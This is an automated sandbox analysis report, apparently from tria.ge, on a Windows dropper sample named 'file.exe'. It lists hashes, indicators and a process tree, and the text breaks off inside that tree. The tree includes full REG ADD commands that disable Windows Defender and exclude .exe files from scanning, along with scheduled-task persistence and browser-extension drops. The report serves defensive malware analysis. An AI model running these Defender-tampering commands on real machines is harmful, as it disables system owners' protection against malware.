Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
131s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
12/01/2023, 17:11
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
585e1fbc9c3b85b0a00667a4242496e7
-
SHA1
e2178f3875fa63a6748ad2d77ee9ea621c6981a6
-
SHA256
cb08c15f7a604b71e7714637a7eb734fd5172aaa06e8ad71cdc855e88aa5643a
-
SHA512
2d9ebeffeaec9c2b113dcc4884c7659dde9efdd3532d6d701b0495acad2eb3724c910027a0b0821ac8e44cc2cecb87e4bc6b6047cccd1820b4131947e72ca18e
-
SSDEEP
196608:91Oig72fgWjAU/5ErgoDh3PemPPEQf4MEkotsvUWiV:3Oi7tdu93VPPEQf/MWq
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lWVaGBLuxBBU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\cvZcJATGqkXfIUHO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AuXcnpONU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DUOXbSmazbUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fHwbcuUAwGaxxLVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hDIhVTokUCGYfCBroAR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lhYzWsVecTGPC = "0" Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fHwbcuUAwGaxxLVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\hvfNVDYxvCzgQiHhW = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\hvfNVDYxvCzgQiHhW = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\cvZcJATGqkXfIUHO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\cvZcJATGqkXfIUHO = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AuXcnpONU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hDIhVTokUCGYfCBroAR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\cvZcJATGqkXfIUHO = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DUOXbSmazbUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lWVaGBLuxBBU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lhYzWsVecTGPC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 1956 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1756 Install.exe 480 Install.exe 1316 pbyhPXw.exe 924 xCUpelI.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Control Panel\International\Geo\Nation xCUpelI.exe -
Loads dropped DLL 12 IoCs
pid Process 2020 file.exe 1756 Install.exe 1756 Install.exe 1756 Install.exe 1756 Install.exe 480 Install.exe 480 Install.exe 480 Install.exe 1956 rundll32.exe 1956 rundll32.exe 1956 rundll32.exe 1956 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json xCUpelI.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 xCUpelI.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA xCUpelI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D xCUpelI.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA xCUpelI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D xCUpelI.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol xCUpelI.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol pbyhPXw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xCUpelI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat xCUpelI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xCUpelI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 xCUpelI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol pbyhPXw.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini pbyhPXw.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\lWVaGBLuxBBU2\HeIdmXj.xml xCUpelI.exe File created C:\Program Files (x86)\hDIhVTokUCGYfCBroAR\xhtAmOf.dll xCUpelI.exe File created C:\Program Files (x86)\hDIhVTokUCGYfCBroAR\UmwSADi.xml xCUpelI.exe File created C:\Program Files (x86)\lhYzWsVecTGPC\eDeSsGd.dll xCUpelI.exe File created C:\Program Files (x86)\DUOXbSmazbUn\OCqmXqv.dll xCUpelI.exe File created C:\Program Files (x86)\AuXcnpONU\WLDyBj.dll xCUpelI.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak xCUpelI.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja xCUpelI.exe File created C:\Program Files (x86)\AuXcnpONU\WsyoIhi.xml xCUpelI.exe File created C:\Program Files (x86)\lWVaGBLuxBBU2\eWMLODDyjBFjK.dll xCUpelI.exe File created C:\Program Files (x86)\lhYzWsVecTGPC\HnXQFwV.xml xCUpelI.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi xCUpelI.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi xCUpelI.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\auXiRxufxTTOyhH.job schtasks.exe File created C:\Windows\Tasks\ZHJIBrVaUMWRPxknL.job schtasks.exe File created C:\Windows\Tasks\bOpYYSCMwzPLWKHDoz.job schtasks.exe File created C:\Windows\Tasks\hxeYasCLbRnJIWdMY.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1748 schtasks.exe 1612 schtasks.exe 1060 schtasks.exe 1912 schtasks.exe 1148 schtasks.exe 1672 schtasks.exe 604 schtasks.exe 1772 schtasks.exe 996 schtasks.exe 1780 schtasks.exe 1496 schtasks.exe 1716 schtasks.exe 772 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-6a-ab-21-cf-ae rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" xCUpelI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6B75522F-692B-4A46-BADA-465722D8486B}\WpadNetworkName = "Network 2" xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople xCUpelI.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-6a-ab-21-cf-ae\WpadDecisionReason = "1" xCUpelI.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-6a-ab-21-cf-ae\WpadDecisionTime = 80e29e87b126d901 xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates xCUpelI.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-6a-ab-21-cf-ae\WpadDecisionTime = 80e29e87b126d901 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs xCUpelI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings xCUpelI.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0048000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 xCUpelI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-6a-ab-21-cf-ae\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6B75522F-692B-4A46-BADA-465722D8486B}\76-6a-ab-21-cf-ae xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates xCUpelI.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-6a-ab-21-cf-ae\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-6a-ab-21-cf-ae\WpadDecision = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 xCUpelI.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6B75522F-692B-4A46-BADA-465722D8486B}\WpadDecisionTime = 80e29e87b126d901 xCUpelI.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6B75522F-692B-4A46-BADA-465722D8486B}\WpadDecision = "0" xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates xCUpelI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings xCUpelI.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 xCUpelI.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-6a-ab-21-cf-ae\WpadDecision = "0" xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs xCUpelI.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs xCUpelI.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs xCUpelI.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1580 powershell.EXE 1580 powershell.EXE 1580 powershell.EXE 1684 powershell.EXE 1684 powershell.EXE 1684 powershell.EXE 1320 powershell.EXE 1320 powershell.EXE 1320 powershell.EXE 1056 powershell.EXE 1056 powershell.EXE 1056 powershell.EXE 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe 924 xCUpelI.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1580 powershell.EXE Token: SeDebugPrivilege 1684 powershell.EXE Token: SeDebugPrivilege 1320 powershell.EXE Token: SeDebugPrivilege 1056 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2020 wrote to memory of 1756 2020 file.exe 28 PID 2020 wrote to memory of 1756 2020 file.exe 28 PID 2020 wrote to memory of 1756 2020 file.exe 28 PID 2020 wrote to memory of 1756 2020 file.exe 28 PID 2020 wrote to memory of 1756 2020 file.exe 28 PID 2020 wrote to memory of 1756 2020 file.exe 28 PID 2020 wrote to memory of 1756 2020 file.exe 28 PID 1756 wrote to memory of 480 1756 Install.exe 29 PID 1756 wrote to memory of 480 1756 Install.exe 29 PID 1756 wrote to memory of 480 1756 Install.exe 29 PID 1756 wrote to memory of 480 1756 Install.exe 29 PID 1756 wrote to memory of 480 1756 Install.exe 29 PID 1756 wrote to memory of 480 1756 Install.exe 29 PID 1756 wrote to memory of 480 1756 Install.exe 29 PID 480 wrote to memory of 1960 480 Install.exe 31 PID 480 wrote to memory of 1960 480 Install.exe 31 PID 480 wrote to memory of 1960 480 Install.exe 31 PID 480 wrote to memory of 1960 480 Install.exe 31 PID 480 wrote to memory of 1960 480 Install.exe 31 PID 480 wrote to memory of 1960 480 Install.exe 31 PID 480 wrote to memory of 1960 480 Install.exe 31 PID 480 wrote to memory of 1856 480 Install.exe 33 PID 480 wrote to memory of 1856 480 Install.exe 33 PID 480 wrote to memory of 1856 480 Install.exe 33 PID 480 wrote to memory of 1856 480 Install.exe 33 PID 480 wrote to memory of 1856 480 Install.exe 33 PID 480 wrote to memory of 1856 480 Install.exe 33 PID 480 wrote to memory of 1856 480 Install.exe 33 PID 1960 wrote to memory of 1544 1960 forfiles.exe 35 PID 1960 wrote to memory of 1544 1960 forfiles.exe 35 PID 1960 wrote to memory of 1544 1960 forfiles.exe 35 PID 1960 wrote to memory of 1544 1960 forfiles.exe 35 PID 1960 wrote to memory of 1544 1960 forfiles.exe 35 PID 1960 wrote to memory of 1544 1960 forfiles.exe 35 PID 1960 wrote to memory of 1544 1960 forfiles.exe 35 PID 1856 wrote to memory of 604 1856 forfiles.exe 36 PID 1856 wrote to memory of 604 1856 forfiles.exe 36 PID 1856 wrote to memory of 604 1856 forfiles.exe 36 PID 1856 wrote to memory of 604 1856 forfiles.exe 36 PID 1856 wrote to memory of 604 1856 forfiles.exe 36 PID 1856 wrote to memory of 604 1856 forfiles.exe 36 PID 1856 wrote to memory of 604 1856 forfiles.exe 36 PID 1544 wrote to memory of 1356 1544 cmd.exe 37 PID 1544 wrote to memory of 1356 1544 cmd.exe 37 PID 1544 wrote to memory of 1356 1544 cmd.exe 37 PID 1544 wrote to memory of 1356 1544 cmd.exe 37 PID 1544 wrote to memory of 1356 1544 cmd.exe 37 PID 1544 wrote to memory of 1356 1544 cmd.exe 37 PID 1544 wrote to memory of 1356 1544 cmd.exe 37 PID 604 wrote to memory of 1372 604 cmd.exe 38 PID 604 wrote to memory of 1372 604 cmd.exe 38 PID 604 wrote to memory of 1372 604 cmd.exe 38 PID 604 wrote to memory of 1372 604 cmd.exe 38 PID 604 wrote to memory of 1372 604 cmd.exe 38 PID 604 wrote to memory of 1372 604 cmd.exe 38 PID 604 wrote to memory of 1372 604 cmd.exe 38 PID 604 wrote to memory of 1136 604 cmd.exe 40 PID 604 wrote to memory of 1136 604 cmd.exe 40 PID 604 wrote to memory of 1136 604 cmd.exe 40 PID 604 wrote to memory of 1136 604 cmd.exe 40 PID 604 wrote to memory of 1136 604 cmd.exe 40 PID 604 wrote to memory of 1136 604 cmd.exe 40 PID 604 wrote to memory of 1136 604 cmd.exe 40 PID 1544 wrote to memory of 1576 1544 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\7zS118E.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\7zS36CA.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:480 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
